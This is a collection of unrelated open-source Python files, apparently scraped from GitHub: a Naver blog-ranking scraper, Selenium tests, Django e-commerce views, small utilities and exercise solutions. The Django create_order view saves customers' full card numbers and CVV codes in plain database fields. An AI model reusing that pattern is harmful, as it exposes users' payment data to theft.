순위)\r\n# 6. 키워드만 변경 후, 클릭시 재동작\r\n# 7. 키워드 자동생성 클릭시, 검색어 값에 ��시 값 입력되기.\r\n\r\n\r\n### 블로그 지수 확인 ###\r\n# 아이디입력\r\nidid = 'like5183'\r\n\r\n\r\n#### 블로그 최신글 10개 가져오기 ###\r\n#### selenium ###\r\n# 크롬 켜기\r\n# driver = webdriver.Chrome('C:/chromedriver.exe')\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument(\"--headless\")\r\ndriver = webdriver.Chrome('./chromedriver', chrome_options=options)\r\n# driver = webdriver.Chrome(\"drivers/chromedriver\")\r\n# 주소 접속. 꼭 모바일로 접속하기\r\ndriver.get('https://m.blog.naver.com/'+idid)\r\nsleep(0.5)\r\n# 나열식으로 보기\r\ndriver.find_element_by_class_name(\"btn_list\").click()\r\nsleep(0.5)\r\n# 파싱\r\nreq = driver.page_source\r\nsoup = BeautifulSoup(req, 'html.parser')\r\n# 크롬 끄기\r\ndriver.close()\r\n# 닉네임가져오기\r\nnickname = ''\r\nnickname = soup.find(class_='user_name').text\r\n# 제목 가져오기\r\nb = soup.find_all(class_='title ell')\r\nsleep(0.5)\r\n# 제목 tlist랑 공백제거 tlist_no_space(키워드자동완성위함)\r\ntlist = []\r\ntlist_no_space = []\r\nfor i in range(0, len(b)):\r\n tlist.append(b[i].text)\r\n tlist_no_space.append(b[i].text.replace(\" \", \"\"))\r\n########## 링크 linklist ###########\r\nlinklist = []\r\nfor a in soup.find_all('div', {\"class\": \"postlist\"}):\r\n linklist.append('https://m.blog.naver.com/' +\r\n idid + a['id'].replace('pl_', '/'))\r\n\r\n\r\n### 함수 정의 ###\r\n########## 각 글별 자동키워드(해시태그분석) 가져오기 #########\r\ndef find_key_auto(number):\r\n testlist = []\r\n testlist.append(nickname)\r\n testlist.append(str(number) + \"번째\")\r\n testlist.append(tlist[number])\r\n req = requests.get(linklist[number])\r\n req = req.text\r\n soup = BeautifulSoup(req, 'html.parser')\r\n # 태그가져오기\r\n if soup.find(class_='post_tag') == None:\r\n testlist.append('-') # 일치없음 > 공란처리 ****************************\r\n else:\r\n tags = soup.find(class_='post_tag').text\r\n tags = tags.replace(\"\\n\", \"\")\r\n tags = tags.split(\"#\")\r\n tags = list(filter(None, tags))\r\n # 해시 태그와 제목의 중복값 리스트 만들기\r\n samelist = []\r\n for i in tags:\r\n if i in tlist_no_space[number]:\r\n samelist.append(i)\r\n else:\r\n pass\r\n\r\n # 가장 긴 키워드를 메인키워드로 하기\r\n # 값이 같을시, 먼저 써있는게 우선으로 나옴\r\n if samelist == []:\r\n testlist.append('-') # 일치없음 > 공란처리 ****************************\r\n else:\r\n best = 0\r\n for index in range(len(samelist)):\r\n if len(samelist[index]) > len(samelist[best]):\r\n best = index\r\n testlist.append(samelist[best])\r\n testlist.append(linklist[number])\r\n\r\n key_auto_list.append(testlist)\r\n\r\n\r\n### 멀티쓰레드 ###\r\nkey_auto_list = []\r\nwith concurrent.futures.ThreadPoolExecutor() as 
executor:\r\n executor.map(find_key_auto, [(i) for i in range(0, len(linklist))])\r\n\r\n#### 판다스 df3 / 글10개 + 키워드 등###\r\ndf3 = pd.DataFrame(key_auto_list, columns=['닉네임', '최신순', '제목', '키워드', 'URL'])\r\ndf3 = df3.sort_values(by=['최신순', ], ascending=True)\r\ndf3 = df3.reset_index(drop=True)\r\n\r\n\r\n####### 키워드별 뷰 30개씩 정보 가져오기 #######\r\nauto_choice = list(df3['키워드'])\r\n### 키워드 입력 ###\r\n### 지금은 오토로 가져온걸로 되게 하기 ###\r\nkey_list = auto_choice\r\n\r\n# 함수설정\r\n\r\n\r\ndef viewrank(keyword):\r\n if keyword == '-': # 수정******************************\r\n pass\r\n\r\n elif keyword == '': # 수정******************************\r\n pass\r\n elif keyword == None: # 수정******************************\r\n pass\r\n else:\r\n total_view_count = 'https://m.search.naver.com/search.naver?sm=mtp_hty.top&where=m&query='+keyword\r\n req = requests.get(total_view_count)\r\n req = req.text\r\n soup = BeautifulSoup(req, 'html.parser')\r\n noad_view_count = len(soup.find_all(class_='bx _svp_item'))\r\n adview_count = len(soup.find_all(class_='ico_ad spview_bf'))\r\n\r\n key_url = 'https://m.search.naver.com/search.naver?where=m_view&query=' + \\\r\n keyword + '&sm=mtb_viw.all&nso=&mode=normal&main_q=&st_coll=&topic_r_cat='\r\n req = requests.get(key_url)\r\n req = req.text\r\n soup = BeautifulSoup(req, 'html.parser')\r\n # 첫페이지 40여개 파싱\r\n search_all = soup.find_all('a', {'class': 'api_txt_lines total_tit'})\r\n # View 순위용 숫자\r\n rank_numb = 0\r\n ###\r\n for k in range(0, len(search_all)):\r\n # 광고는 지나가기\r\n if 'https://adcr.naver.com' in search_all[k]['href']:\r\n pass\r\n else:\r\n list_sub = []\r\n # 광고 없을 때의 순위 따로 채크\r\n rank_numb = rank_numb + 1\r\n list_sub.append(rank_numb)\r\n # 제목\r\n title = search_all[k].text\r\n list_sub.append(keyword)\r\n list_sub.append(title) \r\n list_sub.append(search_all[k]['href'])\r\n list_sub.append(noad_view_count)\r\n list_sub.append(adview_count)\r\n list_main.append(list_sub)\r\n\r\n\r\n### 멀티쓰레드 ###\r\nlist_main = []\r\nwith concurrent.futures.ThreadPoolExecutor() as executor:\r\n executor.map(viewrank, key_list)\r\n\r\ndf2 = pd.DataFrame(list_main, columns=[\r\n 'View 순위', '키워드', '제목', 'URL', '통합View 노출수', '통합View AD수'])\r\ndf2 = df2.sort_values(by=['키워드', 'View 순위', ], ascending=True)\r\ndf2 = df2.reset_index(drop=True)\r\n\r\n### 값 체크하기 ###\r\nranking_list = []\r\nfor i in range(0, len(list_main)):\r\n testlist = []\r\n if df2['URL'][i] in list(df3['URL']):\r\n testlist.append(int(df2['View 순위'][i]))\r\n testlist.append(str(df2['URL'][i]))\r\n testlist.append(str(df2['통합View 노출수'][i]))\r\n testlist.append(str(df2['통합View AD수'][i]))\r\n ranking_list.append(testlist)\r\n else:\r\n pass\r\n\r\ndf4 = pd.DataFrame(ranking_list, columns=[\r\n 'View 순위', 'URL', '통합View 노출수', '통합View AD수'])\r\ndf4 = df4.sort_values(by=['View 순위', 'URL', ], ascending=True)\r\ndf4 = df4.reset_index(drop=True)\r\n\r\n### 결과 값 ###\r\ndf_final = pd.merge(df3, df4, on=\"URL\", how='left')\r\n\r\nx = df_final.to_csv()\r\n# print(x)","repo_name":"sebastianrcnt/hwaseon","sub_path":"legacy/blog_rank.py","file_name":"blog_rank.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42504135311","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@author: zhanghe\n@software: PyCharm\n@file: test_web.py\n@time: 2016/11/22 上午10:52\n\"\"\"\n\n\nimport unittest\nimport sys\nsys.path.append('..')\n\nfrom config import CHROME_DRIVER_PATH, PROXY\nfrom selenium import webdriver\nfrom 
selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\n\nclass LoginTest(unittest.TestCase):\n\n def setUp(self):\n # self.driver = webdriver.Firefox()\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--proxy-server=%s' % PROXY)\n self.driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH, chrome_options=chrome_options)\n\n def test_get_page_title(self):\n url_link = 'https://www.s2c.wealink.com/index/need'\n self.driver.get(url_link)\n web_title = self.driver.title\n # print web_title, type(web_title)\n self.assertEqual(web_title, u'8公里 - 找同城服务,解决您的一切生活问题', u'测试失败')\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zhanghe06/selenium_project","sub_path":"tests/test_web.py","file_name":"test_web.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"29151327780","text":"from django.shortcuts import render, redirect\nfrom .models import *\n\n\ndef overview(request, id):\n product = Product.objects.get(pk=id)\n data = {\n 'title': product.name + ' | Shopzesta',\n 'product': product,\n }\n return render(request, 'product/overview.html', data)\n\n\ndef products(request):\n categories = Category.objects.all()\n products = Product.objects.all()\n num_of_query = 9\n\n cat_query = request.GET.get('category')\n\n if cat_query and cat_query != 'None':\n products = products.filter(category__name=cat_query)\n\n page = int(request.GET.get('page')) if request.GET.get('page') else 1\n\n print(num_of_query, page)\n\n data = {\n 'title': 'Shop | Shopzesta',\n 'products': products[(page-1)*num_of_query: page*num_of_query],\n 'categories': categories,\n 'cat_query': cat_query,\n 'page': page,\n 'prev_page': page - 1,\n 'prev_page2': page - 2,\n 'prev_page3': page - 3,\n 'next_page': page + 1,\n 'next_page2': page + 2,\n 'next_page3': page + 3,\n }\n return render(request, 'product/products.html', data)\n\n\ndef cart(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n cart = Cart.objects.filter(user=request.user).first()\n data = {\n 'title': 'Cart | Shopzesta',\n 'cart': cart,\n 'cart_items': CartItem.objects.filter(cart=cart)\n }\n\n if request.method == 'GET':\n return render(request, 'product/cart.html', data)\n\n if request.method == 'POST':\n product = Product.objects.get(pk=request.POST['product'])\n quantity = int(request.POST['quantity'])\n cart_item = CartItem.objects.filter(product=product).first()\n\n cur_quantity = cart_item.quantity if cart_item else 0\n\n if product.count_in_stock - quantity - cur_quantity < 0:\n data['error'] = 'Not enough stock'\n return render(request, 'product/cart.html', data)\n\n cart_item.quantity += quantity\n\n if cart_item.quantity == 0:\n cart_item.delete()\n else:\n cart_item.save()\n\n return redirect('product:cart')\n\n\ndef add_to_cart(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n if request.method == 'POST':\n product = Product.objects.get(pk=request.POST['product'])\n quantity = int(request.POST['quantity'])\n qty_abs = request.POST.get('qty_abs')\n\n cart = Cart.objects.filter(user=request.user).first()\n cart_item = CartItem.objects.filter(\n product=product, cart=cart).first()\n\n if product.count_in_stock - quantity < 0:\n data = {\n 'title': 'Cart | Shopzesta',\n 'cart': cart,\n 'cart_items': CartItem.objects.filter(cart=cart),\n 'error': 'Not enough 
stock',\n }\n return render(request, 'product/cart.html', data)\n\n if cart is None:\n cart = Cart(user=request.user)\n cart.save()\n\n if cart_item is None:\n cart_item = CartItem(product=product, quantity=quantity, cart=cart)\n cart_item.save()\n else:\n if qty_abs:\n cart_item.quantity = quantity\n else:\n cart_item.quantity += quantity\n\n cart_item.save()\n\n return redirect('core:index')\n\n\ndef create_order(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n if request.method == 'POST':\n cart = Cart.objects.filter(user=request.user).first()\n\n if cart is None:\n return redirect('product:products')\n\n # Checking count in stock\n cart_items = CartItem.objects.filter(cart=cart)\n\n for cart_item in cart_items:\n if cart_item.product.count_in_stock < cart_item.quantity:\n data = {\n 'title': 'Cart | Shopzesta',\n 'cart': cart,\n 'cart_items': cart_items,\n 'error': 'Not enough stock',\n }\n return render(request, 'product/cart.html', data)\n\n order = Order(\n user=request.user,\n total_price=cart.total_price,\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n email=request.POST['email'],\n address=request.POST['address'],\n address2=request.POST['address2'],\n zipcode=request.POST['zipcode'],\n name_on_card=request.POST['name_on_card'],\n card_number=request.POST['card_number'],\n expiration=request.POST['expiration'],\n cvv=request.POST['cvv'],\n )\n order.save()\n\n for item in cart_items:\n order_item = OrderItem(\n order=order,\n product=item.product,\n quantity=item.quantity,\n qty_price=item.qty_price\n )\n order_item.save()\n\n cart.delete()\n\n return redirect('core:index')\n\n\ndef remove_from_cart(request):\n if not request.user.is_authenticated:\n return redirect('user:login')\n\n if request.method == 'POST':\n product = Product.objects.get(pk=request.POST['product'])\n cart = Cart.objects.filter(user=request.user).first()\n\n cart_item = CartItem.objects.filter(\n product=product, cart=cart).first()\n\n if cart_item:\n cart_item.delete()\n\n cart_item = CartItem.objects.filter(cart=cart).first()\n\n if cart_item is None:\n cart.delete()\n\n return redirect('product:cart')\n","repo_name":"himelbikon/shopzesta","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14153805840","text":"import random\n\nfrom generator_types.base import BaseTypeGenerator\n\n\nclass Email(BaseTypeGenerator):\n email_providers = [\"@gmail.com\",\n \"@yahoo.com\",\n \"@outlook.com\",\n \"@aol.com\",\n \"@protonmall.com\",\n \"@icloud.com\",\n \"@gmx.com\"]\n\n def get_next_value(self, related_values=None) -> any:\n sample = \"\"\n if related_values:\n firstname = related_values[0].lower()\n lastname = related_values[1].lower()\n sample = firstname + lastname + random.choice(self.email_providers)\n return sample\n","repo_name":"nus-dbdesign-group22/realisticdata","sub_path":"app/generator_types/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20000980828","text":"#!/usr/bin/env python3\n\nimport datetime\n# you need python-notify2\nimport notify2\nimport time\n\ndef main():\n now = datetime.datetime.now()\n title = \"Time Notification\"\n if now.hour >= 23 or now.hour <= 4:\n contents = f\"It's {now.hour:02}:{now.minute:02} now!\"\n else:\n return\n 
noti = notify2.Notification(title, contents)\n # https://developer-old.gnome.org/notification-spec/#hints\n # transient: When set the server will treat the notification as transient and by-pass the server's persistence capability, if it should exist. \n noti.set_hint(\"transient\", True)\n noti.show()\n\n\nif __name__ == \"__main__\":\n notify2.init(\"sleep-timer\")\n main()\n","repo_name":"taoky/scripts","sub_path":"sleep-timer/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"33605268376","text":"def gc_genome_skew(dna):\n gc_skew=[]\n gc_diff=0\n \n for i in range(len(dna)):\n gc_skew.append(gc_diff)\n if dna[i]=='C':\n gc_diff-=1\n if dna[i]=='G':\n gc_diff+=1\n \n oric_list=[]\n min_value = min(gc_skew)\n \n for i in range(len(gc_skew)):\n if(gc_skew[i]==min_value):\n oric_list.append(i)\n \n return oric_list\n\ndef main():\n with open('datasets/rosalind_ba1f.txt') as input_file:\n dna = input_file.read().strip()\n \n oric_list = gc_genome_skew(dna)\n \n print(' '.join(list(map(str, oric_list))))\n \n with open('solutions/rosalind_ba1f.txt', 'w') as output_file:\n output_file.write(' '.join(list(map(str, oric_list))))\n \nif(__name__=='__main__'):\n main()","repo_name":"ChaoticMarauder/Project_Rosalind","sub_path":"Textbook/BA1F.py","file_name":"BA1F.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"74293499477","text":"import tkinter as tk\nfrom tkinter import ttk\nimport pymysql\n\nroot = tk.Tk()\ntree = ttk.Treeview(root)\ntree.pack()\n\ndb = pymysql.connect(\"localhost\", \"root\", \"123\", \"university\")\ncursor = db.cursor()\n\ndef student_department():\n\ttree.delete(*tree.get_children())\n\n\ttree[\"columns\"] = (\"Name\", \"DOB\", \"Department_name\")\n\ttree.column(\"#0\", width=100)\n\ttree.column(\"Name\", width=100)\n\ttree.column(\"DOB\", width=100)\n\ttree.column(\"Department_name\", width=150)\n\n\ttree.heading(\"#0\", text=\"Panther ID\")\n\ttree.heading(\"Name\", text=\"Name\")\n\ttree.heading(\"DOB\", text=\"Birth year\")\n\ttree.heading(\"Department_name\", text=\"Department name\")\n\n\tsql ='''select Student.Panther_ID, Student.Name, Student.DOB, Department.Name\n\t\t\tfrom Student, Department\n\t\t\twhere Student.Department_ID = Department.Department_ID'''\n\n\tcursor.execute(sql)\n\tresult = cursor.fetchall()\n\n\tfor i in range(0, len(result)):\n\t\ttree.insert(\"\", i, text=str(result[i][0]), values=(str(result[i][1]), str(result[i][2]), str(result[i][3])))\n\n\ndef instructor_info():\n\ttree.delete(*tree.get_children())\n\n\ttree[\"columns\"] = (\"Name\", \"Department_ID\")\n\ttree.column(\"#0\", width=100)\n\ttree.column(\"Name\", width=100)\n\ttree.column(\"Department_ID\", width=100)\n\n\ttree.heading(\"#0\", text=\"Instructor ID\")\n\ttree.heading(\"Name\", text=\"Name\")\n\ttree.heading(\"Department_ID\", text=\"Department ID\")\n\n\tsql = \"select * from Instructor\"\n\tcursor.execute(sql)\n\tresult = cursor.fetchall()\n\n\tfor i in range(0, len(result)):\n\t\ttree.insert(\"\", i, text=str(result[i][0]), values=(str(result[i][1]), str(result[i][2])))\t\n\n\ndef student_info():\n\ttree.delete(*tree.get_children())\n\n\ttree[\"columns\"] = (\"Name\", \"DOB\")\n\ttree.column(\"#0\", width=100)\n\ttree.column(\"Name\", width=100)\n\ttree.column(\"DOB\", width=100)\n\n\ttree.heading(\"#0\", text=\"Panther 
ID\")\n\ttree.heading(\"Name\", text=\"Name\")\n\ttree.heading(\"DOB\", text=\"Birth year\")\n\n\n\tsql = \"select * from Student\"\n\n\tcursor.execute(sql)\n\tresult = cursor.fetchall()\n\n\tfor i in range(0, len(result)):\n\t\ttree.insert(\"\", i, text=str(result[i][0]), values=(str(result[i][1]), str(result[i][2])))\n\n\n\nbtn1 = tk.Button(root, text=\"Student-Department\", command=student_department).pack()\nbtn2 = tk.Button(root, text=\"Instructor_info\", command=instructor_info).pack()\nbtn3 = tk.Button(root, text=\"Student_info\", command=student_info).pack()\n\nstudent_info()\n\nroot.mainloop()","repo_name":"Efaz95/CS_2302","sub_path":"HW8.py","file_name":"HW8.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40305816201","text":"from subprocess import PIPE, STDOUT, run\nfrom src.config import ponto_entrada\n\n\ndef executa_comando(argumentos):\n try:\n comando = [\"python\", ponto_entrada]\n comando.extend(argumentos)\n return run(comando,\n stdout=PIPE,\n stderr=STDOUT,\n encoding=\"utf-8\").stdout.strip()\n except Exception:\n raise\n","repo_name":"douglasdcm/easy_db","sub_path":"tests/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"40021294900","text":"from tkinter import *\n \n \ngui = Tk ()\ngui.title(\"imegnus\")\n\n# gui.iconbitmap('icon.ico')\n# gui.geometry('600*300')\n#window size min and max\n\ngui.maxsize(width=1000,height=1000)\ngui.minsize(width=1000,height=1000)\n\n#funcation\ndef func():\n x=var.get()\n lbl.config(text = x,bg = \"green\")\n \n# create label\nlbl = Label(gui,text = \"username\",bg=\"red\",fg=\"black\")#use funcation opctionl\n# first opctionl(pack,gride,place)\n\nlbl.place(x= 10,y=10)\n# con = StringVar()\nlbl = Label(gui,text = \"nathing\",bg=\"black\",fg=\"white\")#show data on display\nlbl.place(x= 40,y=120)\n\n#entrybox\nvar = StringVar()\nent = Entry(gui,bg = \"red\",fg = \"black\",bd = \"5\",textvariable=var)\nent.place(x=80,y=10)\n\n# buttion\nbtn = Button(gui,text=\"submit\",bg = \"green\",command=func) \nbtn.place(x=60,y=60)\n\ngui.mainloop()","repo_name":"python-hacked/Tkinter-Gui","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"71783911318","text":"import json\nimport pandas as pd\nimport numpy as np\nfrom torch.utils.data import DataLoader\nimport torch\nCUDA = torch.cuda.is_available()\n\nprint(f\"IS CUDA AVAILABLE: {CUDA}\")\n\nclass TransformerInference:\n def __init__(\n self, model, tree_transform, pipeline_inverse, scalerx, maxcardinality\n ):\n self.tree_transform = tree_transform\n self.model = model\n if CUDA:\n self.model = self.model.cuda()\n self.pipeline_inverse = pipeline_inverse\n self.scalerx = scalerx\n self.maxcardinality = maxcardinality\n \n\n def pred2index_dict(self, x, pred_to_index, maxcardinality):\n resp = {}\n x = json.loads(x)\n for el in x.keys():\n if el in pred_to_index:\n resp[pred_to_index[el]] = float(x[el]) / maxcardinality\n return resp\n\n def prepare_query_level_data(\n self, x_test_query\n ):\n \"\"\"\n Apply StandardScaller to columns except for json_cardinality that need other proccess\n \"\"\"\n # Scale x_query data.\n xqtest = x_test_query.drop(columns=[\"json_cardinality\"])\n x_test_scaled = 
self.scalerx.transform(xqtest)\n x_test_query = pd.concat(\n [\n pd.DataFrame(x_test_scaled, index=xqtest.index, columns=xqtest.columns),\n x_test_query[[\"json_cardinality\"]],\n ],\n axis=1,\n )\n x_test_query[\"json_cardinality\"] = x_test_query[\"json_cardinality\"].apply(\n lambda x: self.pred2index_dict(\n x, self.tree_transform.get_pred_index(), self.maxcardinality\n )\n )\n\n return x_test_query\n\n \n def prepare_query_level_data_no_jc(\n self, x_test_query\n ):\n \"\"\"\n Apply StandardScaller to columns except for json_cardinality that need other proccess\n \"\"\"\n # Scale x_query data.\n xqtest = x_test_query.copy()\n x_test_scaled = self.scalerx.transform(xqtest)\n x_test_query = pd.DataFrame(x_test_scaled, index=xqtest.index, columns=xqtest.columns)\n \n\n return x_test_query\n \n \n def fix_tree(self, tree):\n \"\"\"\n Trees in data must include in first position join type follow by predicates of childs. We check and fix this.\n \"\"\"\n try:\n if len(tree) == 1:\n assert isinstance(tree[0], str)\n return tree\n else:\n assert len(tree) == 3\n assert isinstance(tree[0], str)\n preds = []\n if len(tree[0].split(\"ᶲ\")) == 1:\n\n tree_left = self.fix_tree(tree[1])\n preds.extend(tree_left[0].split(\"ᶲ\")[1:])\n\n tree_right = self.fix_tree(tree[2])\n preds.extend(tree_right[0].split(\"ᶲ\")[1:])\n preds = list(set(preds))\n tree[0] = tree[0] + \"ᶲ\" + \"ᶲ\".join(preds)\n return tree\n else:\n return tree\n\n except Exception as ex:\n print(tree)\n return tree\n\n def json_loads(self, X, X_query):\n respX = []\n respX_query = []\n for x_tree, x_query in list(zip(X, X_query)):\n try:\n x_tree = json.loads(x_tree)\n respX.append(x_tree)\n respX_query.append(x_query)\n except:\n print(\"Error in data ignored!\", x_tree, x_query)\n return respX, respX_query\n\n def index2sparse(self, tree, sizeindexes):\n resp = []\n for el in tree:\n if type(el[0]) == tuple:\n resp.append(self.index2sparse(el, sizeindexes))\n else:\n a = np.array(el)\n b = np.zeros((a.size, sizeindexes))\n b[np.arange(a.size), a] = 1\n onehot = np.sum(b, axis=0, keepdims=True)[0]\n resp.append(onehot)\n return tuple(resp)\n\n def collate_with_card(self, x):\n \"\"\"\n Preprocess inputs values, transform index2vec values,\n them predict aec.encoder to dimensionality reduction\n \"\"\"\n trees = []\n sizeindexes = len(self.tree_transform.get_pred_index())\n\n for tree, query_data in x:\n b = np.zeros((sizeindexes))\n try:\n for key in query_data[-1].keys():\n b[key] = query_data[-1][key]\n except Exception as ex:\n print(ex)\n print(tree)\n print(\"Error en cardinalidades\", str(query_data[-1]))\n trees.append(\n tuple(\n [\n self.index2sparse(tree, sizeindexes),\n np.concatenate([query_data[:-1], b]).tolist(),\n ]\n )\n )\n return trees\n\n def collate(self, x):\n #print(\"NeoRegression, collate method active\")\n \"\"\"Preprocess inputs values, transform index2vec values, them predict aec.encoder to dimensionality reduction\"\"\"\n trees = []\n targets = []\n sizeindexes = len(self.tree_transform.get_pred_index())\n for tree, query_data in x:\n trees.append(tuple([self.index2sparse(tree, sizeindexes), query_data]))\n return trees\n \n \n def prepare_with_card(self, x_test_tree, x_test_query):\n x_test_query = self.prepare_query_level_data(x_test_query)\n\n Xt, Xq = self.json_loads(x_test_tree, x_test_query.values)\n Xt = [self.fix_tree(x) for x in Xt]\n Xt = self.tree_transform.transform(Xt)\n pairs_val = list(zip(Xt, Xq))\n dataset_val = DataLoader(\n pairs_val,\n batch_size=64,\n num_workers=0,\n 
shuffle=False,\n collate_fn=self.collate_with_card,\n )\n return dataset_val\n \n def prepare(self, x_test_tree, x_test_query):\n x_test_query = self.prepare_query_level_data_no_jc(x_test_query)\n\n Xt, Xq = self.json_loads(x_test_tree, x_test_query.values)\n Xt = [self.fix_tree(x) for x in Xt]\n Xt = self.tree_transform.transform(Xt)\n pairs_val = list(zip(Xt, Xq))\n dataset_val = DataLoader(\n pairs_val,\n batch_size=64,\n num_workers=0,\n shuffle=False,\n collate_fn=self.collate,\n )\n return dataset_val\n\n def getpredictions_info(self, dataset_val):\n results = []\n results_extend = []\n for x in dataset_val:\n results_val = self.model(x)\n results.append(\n self.pipeline_inverse.inverse_transform(\n results_val.cpu().detach().numpy()\n ).tolist()\n )\n results_extend.extend(\n self.pipeline_inverse.inverse_transform(\n results_val.cpu().detach().numpy()\n ).tolist()\n )\n \n return results, results_extend\n","repo_name":"ccarmonar/memoria_utfsm_deep_learning_models","sub_path":"sparql_neo_RL/functions/transform_inference.py","file_name":"transform_inference.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9238323110","text":"\n'''\nseed_files.py audio \n\n^^ seed files from command line \n'''\nimport sys, uuid, os, shutil, time, random\nimport sounddevice as sd \nimport pandas as pd \nimport soundfile as sf \nimport pyautogui, markovify \n\ndef audio_record(filename, duration, fs, channels):\n print('---------------')\n print('recording audio...')\n myrecording = sd.rec(int(duration * fs), samplerate=fs, channels=channels)\n sd.wait()\n sf.write(filename, myrecording, fs)\n print('done recording %s'%(filename))\n print('---------------')\n\ndef text_record(filename, text_model):\n\n textfile=open(filename, 'w')\n # Print five randomly-generated sentences\n for i in range(5):\n sentence=text_model.make_sentence()\n textfile.write(sentence)\n\n textfile.close()\n\ndef image_record(filename):\n pyautogui.screenshot(filename)\n\ndef video_record(filename, test_dir, train_dir):\n print('---------------')\n print('recording video...')\n cur_dur=os.getcwd()\n os.chdir(test_dir+'/helpers/video_record')\n # 3 second recordings \n os.system('python3 record.py %s 3 %s'%(filename, train_dir))\n os.chdir(cur_dir)\n print('---------------')\n\ndef csv_record(filename, newfilename):\n # take in test .CSV and manipulate the columns by copy/paste and re-write \n csvfile=pd.read_csv(filename)\n filelength=len(filename)\n newlength=random.randint(0,filelength-1)\n\n # now re-write CSV with the new length \n g=csvfile.iloc[0:newlength]\n randint2=random.randint(0,1)\n if randint2 == 0:\n g=g+g \n g.to_csv(newfilename)\n\ndef prev_dir(directory):\n g=directory.split('/')\n dir_=''\n for i in range(len(g)):\n if i != len(g)-1:\n if i==0:\n dir_=dir_+g[i]\n else:\n dir_=dir_+'/'+g[i]\n # print(dir_)\n return dir_\n\n# get filetype from command line \nfiletype=sys.argv[1]\ntrain_dir=sys.argv[2]\ncur_dir=os.getcwd()\n\ntry:\n os.chdir(train_dir)\nexcept:\n os.mkdir(train_dir)\n\nos.chdir(cur_dir)\n# prevdir=prev_dir(cur_dir)\n# prevdir=os.getcwd()\n\nif filetype == 'audio':\n\n '''\n sample command in terminal:\n python3 seed_files.py audio /Users/jimschwoebel/allie/train_dir/one\n '''\n \n # load test data directory \n if train_dir.endswith('one'):\n data_dir=cur_dir+'/helpers/audio_data/one'\n elif train_dir.endswith('two'):\n data_dir=cur_dir+'/helpers/audio_data/two'\n\n 
listdir=os.listdir(data_dir)\n # print(data_dir)\n # option 1 - copy test files\n # --------------------------\n for i in range(len(listdir)):\n if listdir[i][-4:]=='.wav':\n print(listdir[i])\n shutil.copy(data_dir+'/'+listdir[i], train_dir+'/'+listdir[i])\n \n # option 2 - record data yourself (must be non-silent data)\n # --------------------------\n # for i in range(20):\n # filename=str(uuid.uuid4())+'.wav'\n # audio_record(filename, 1, 16000, 1)\nelif filetype == 'text':\n '''\n python3 seed_files.py text /Users/jimschwoebel/allie/train_dir/one\n '''\n # Get raw text as string (the Brother's Karamazov)\n with open(cur_dir+'/helpers/text.txt') as f:\n text = f.read()\n # Build the model.\n text_model = markovify.Text(text)\n os.chdir(train_dir)\n for i in range(20):\n filename=str(uuid.uuid4()).replace('-','_')+'.txt'\n text_record(filename, text_model)\n\nelif filetype == 'image':\n '''\n python3 seed_files.py image /Users/jimschwoebel/allie/train_dir/one\n '''\n # take 20 random screenshots with pyscreenshot\n os.chdir(train_dir)\n for i in range(20):\n filename=str(uuid.uuid4()).replace('-','_')+'.png'\n image_record(filename)\n\nelif filetype == 'video':\n '''\n python3 seed_files.py video /Users/jimschwoebel/allie/train_dir/one\n '''\n # make 20 random videos with screenshots \n os.chdir(train_dir)\n for i in range(20):\n filename=str(uuid.uuid4()).replace('-','_')+'.avi'\n video_record(filename, cur_dir, train_dir)\n\nelif filetype == 'csv':\n '''\n python3 seed_files.py csv /Users/jimschwoebel/allie/train_dir/one\n '''\n # prepopulate 20 random csv files with same headers \n filename='test_csv.csv'\n shutil.copy(cur_dir+'/'+filename, train_dir+'/'+filename)\n os.chdir(train_dir)\n for i in range(20):\n newfilename=str(uuid.uuid4())+'.csv'\n csv_record(filename, newfilename)\n os.remove(filename)\n","repo_name":"jim-schwoebel/allie","sub_path":"tests/seed_files.py","file_name":"seed_files.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"85"} +{"seq_id":"23265018756","text":"\n# Given a binary tree, find its maximum depth.\n\n# The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\n\n# Note: A leaf is a node with no children.\n\n# Example:\n\n# Given binary tree [3,9,20,null,null,15,7],\n\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# return its depth = 3.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def maxDepth(self, root):\n \"\"\"\n :type 